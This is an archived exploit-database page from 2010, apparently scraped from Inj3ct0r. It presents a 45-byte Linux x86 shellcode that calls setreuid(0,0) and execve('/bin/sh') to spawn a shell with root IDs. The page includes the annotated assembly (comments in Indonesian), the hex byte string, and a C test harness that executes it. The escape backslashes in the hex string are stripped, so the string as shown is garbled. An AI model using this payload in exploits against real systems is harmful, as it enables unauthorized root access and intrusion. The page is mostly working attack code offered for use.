Home / os / win7

linux/x86 execute /bin/sh with setreuid 0,0 45 Bytes

Posted on 17 June 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>linux/x86 execute /bin/sh with setreuid 0,0 45 Bytes</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>====================================================
linux/x86 execute /bin/sh with setreuid 0,0 45 Bytes
====================================================


/*
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /'             __  /'__`        / \__  /'__`                   0
0  /\_,     ___   /\_/\_      ___  ,_/ /   _ ___           1
1  /_/  /' _ ` / /_/_\_&lt;_  /'___  /    /`'__          0
0       / /    /   / \__/  \_  \_   /           1
1       \_ \_ \_\_   \____/ \____\ \__\ \____/ \_           0
0       /_//_//_/ \_ /___/  /____/ /__/ /___/  /_/           1
1                   \____/ &gt;&gt; Exploit database separated by exploit   0
0                   /___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
Title  : execute /bin/sh with setreuid 0,0
Name   : 45 bytes sys_setreuid (0,0) - sys_execve(&quot;/bin/sh&quot;,&quot;&quot;,&quot;&quot;)
Date   : Thu Jun 17 16:58:40 2010
Author : gunslinger_ &lt;yudha.gunslinger[at]gmail.com&gt;
Web    : http://devilzc0de.org
blog   : http://gunslingerc0de.wordpress.com
tested on : linux debian
special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org)
greetz : jasakom.com , devilzc0de.org - com , xc0de.or.id, yogyacarderlink.web.id, serverisdown.org
tested on : linux debian
---------------------------Original assembly-----------------------------
global _start

_start:
	xor eax, eax	; bersihkan register!
	xor edx, edx	;
	xor ebx, ebx	;
	xor ecx, ecx	;
	
        mov al, 70     	; sys_setreuid()
        add bl,1        ; tambah 1 register bl menjadi 1 -&gt; sys_setreuid(1,)
        dec bl     	; kurangi 1 register bl menjadi 0 -&gt; sys_setreuid(0,)
	mov cl,bl	; kopikan nilai register bl ke cl. nilai register cl menjadi 0  -&gt; sys_setreuid(0,0)
        int 0x80	; interupsi kernel kerjakan !

        jmp short end	; loncat tanpa kondisi ke end &gt;-------------------------------------------------------------------.
			;												  |
	start:		; start terpanggil &lt;--------------------------------------------------------------------------.	  |
	mov al,11	; syscall nomer 11 execve 								      |	  |				;syscall sys_execve(args1,args2,args3)
	pop ebx		; ambil dari stack &lt;-------------------------------------------------------------------------------------------------------.	;sys_execve (&quot;/bin/sh&quot;
	mov ecx, edx	; nilai register edx kosong, lalu kopikan ke register ecx jadi ecx kosong	              |   |			   |	;sys_execve (&quot;/bin/sh&quot;,0,0)
	int 0x80	; interupsi kernel, kerjakan !					                              |	  |			   |	;
			;             									              |   |			   |
	xor eax, eax	; bersihkan register ecx								      |   |			   |	;syscall exit()
	inc eax		; increment eax, atau tambah eax 1 karena nilai eax 0 jadi eax menjadi 1 syscall nomer 1 exit |	  |			   |	;sys_exit()
	int 0x80	; interupsi kernel, kerjakan !								      |	  |			   |	;
			;											      |	  |			   |
	end:		; label start &lt;-----------------------------------------------------------------------------------' 			   |
	call start	; panggil start &gt;-----------------------------------------------------------------------------'          		   |
	db '/bin/sh'	; masukan string '/bin/sh' ke stack &gt;--------------------------------------------------------------------------------------'

------------------------Eof Original assembly-----------------------------
*/
#include &lt;stdio.h&gt;

char *shellcode=
		&quot;x31xc0&quot;                    /* xor    %eax,%eax */
		&quot;x31xd2&quot;                    /* xor    %edx,%edx */
		&quot;x31xdb&quot;                    /* xor    %ebx,%ebx */
		&quot;x31xc9&quot;                    /* xor    %ecx,%ecx */
		&quot;xb0x46&quot;                    /* mov    $0x46,%al */
		&quot;x80xc3x01&quot;                /* add    $0x1,%bl */
		&quot;xfexcb&quot;                    /* dec    %bl */
		&quot;x88xd9&quot;                    /* mov    %bl,%cl */
		&quot;xcdx80&quot;                    /* int    $0x80 */
		&quot;xebx0c&quot;                    /* jmp    0x8048081 */
		&quot;xb0x0b&quot;                    /* mov    $0xb,%al */
		&quot;x5b&quot;                        /* pop    %ebx */
		&quot;x89xd1&quot;                    /* mov    %edx,%ecx */
		&quot;xcdx80&quot;                    /* int    $0x80 */
		&quot;x31xc0&quot;                    /* xor    %eax,%eax */
		&quot;x40&quot;                        /* inc    %eax */
		&quot;xcdx80&quot;                    /* int    $0x80 */
		&quot;xe8xefxffxffxff&quot;        /* call   0x8048075 */
		&quot;x2f&quot;                        /* das     */
		&quot;x62x69x6e&quot;                /* bound  %ebp,0x6e(%ecx) */
		&quot;x2f&quot;                        /* das     */
		&quot;x73x68&quot;;                   /* jae    0x80480f5 */

int main(void)
{
		fprintf(stdout,&quot;Length: %d
&quot;,strlen(shellcode));
		((void (*)(void)) shellcode)();
		return 0;
}


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-17]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :